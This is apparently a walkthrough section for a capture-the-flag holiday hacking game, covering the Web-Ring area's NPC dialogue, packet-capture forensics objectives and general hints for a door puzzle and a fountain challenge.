Area: Web-Ring
Area Layout
Visit 1
Immediately after entering this area four new objective tasks are unlocked. Head to the right to speak with Alabaster Snowball, unlocking a hint for the Naughty IP task. Alabaster Snowball
Hey there! I'm Alabaster Snowball
And I have to say, I'm a bit distressed.
I was working with the dwarves and their Boria mines, and I found some disturbing activity!
Looking through [these artifacts](assets/boriaArtifacts.zip), I think something naughty's going on.
Can you please take a look and answer a few questions for me?
First, we need to know where the attacker is coming from.
If you haven't looked at Wireshark's _Statistics_ menu, this might be a good time!
...
There doesn't appear to be any terminals used to solve these objective tasks. The first objective task is . After retrieving the naughty IP, submit it via the Objectives tab in the badge. This will complete the objective task and reward you with 5 coins.
The second objective task is . After retrieving the username, submit it via the Objectives tab in the badge. This will complete the objective task and reward you with 5 coins.
The third objective task is . After retrieving the URL path, submit it via the Objectives tab in the badge. This will complete the objective task and reward you with 5 coins.
The fourth objective task is . After retrieving the URL, submit it via the Objectives tab in the badge. This will complete the objective task and reward you with 10 coins, and an achievement.
Speak with Alabaster again to unlock some hints for the objective tasks that were just completed as well as for the 'Open Boria Mine Door' objective task. Alabaster Snowball
Aha, you found the naughty actor! Next, please look into the account brute force attack.
You can focus on requests to `/login.html`~
Alice? I totally expected Eve! Well how about forced browsing? What's the first URL path they found that way?
The misses will have HTTP status code `404` and, in this case, the successful guesses return `200`.
Great! Just one more challenge! It looks like they made the server pull credentials from IMDS. What URL was forced?
AWS uses a specific IP address for IMDS lookups. Searching for that in the PCAP should get you there quickly.
Fantastic! It seems simpler now that I've seen it once. Thanks for showing me!
Hey, so maybe I can help you out a bit with the door to the mines.
First, it'd be great to bring an Elvish keyboard, but if you can't find one, I'm sure other input will do.
Instead, take a minute to read the HTML/JavaScript source and consider how the locks are processed.
Next, take a look at the `Content-Security-Policy` header. That drives how certain content is handled.
Lastly, remember that input sanitization might happen on either the client or server ends!
...
Continue moving to the right then speak with Hal Tandybuck. This conversation will unlock the 'Open Boria Mine Door' task. Interact with the Cranberry Pi terminal to begin the objective task. Successfully unlocking Pins 1-3 will unlock an achievement, complete the Boria Mine Door objective task, and unlock the task telling you to speak with Hal Tandybuck for the next full task. It will also open the door just to the right of this terminal. Completing all six pins will grant 50 coins and a bonus achievement.
Speak with Hal Tandybuck again before going through the newly unlocked door. You will receive some hints about the upcoming challenge, some additional ones if you've solved all 6 pins, and you will unlock the next objective task 'Glamtariel's Fountain'. Hal Tandybuck
Great! Thanks so much for your help!
When you get to the fountain inside, there are some things you should consider.
First, it might be helpful to focus on Glamtariel's CAPITALIZED words.
If you finish those locks, I might just have another hint for you!
Wha - what?? You opened all the locks?! Well then...
Did you see the nearby terminal with evidence of an XXE attack?
Maybe take a close look at that kind of thing.
...
Go through the Boria Door to enter the Fountain Area.
Visit 2
None of the NPC's here have new dialog. Head to the left and through the door, back into the .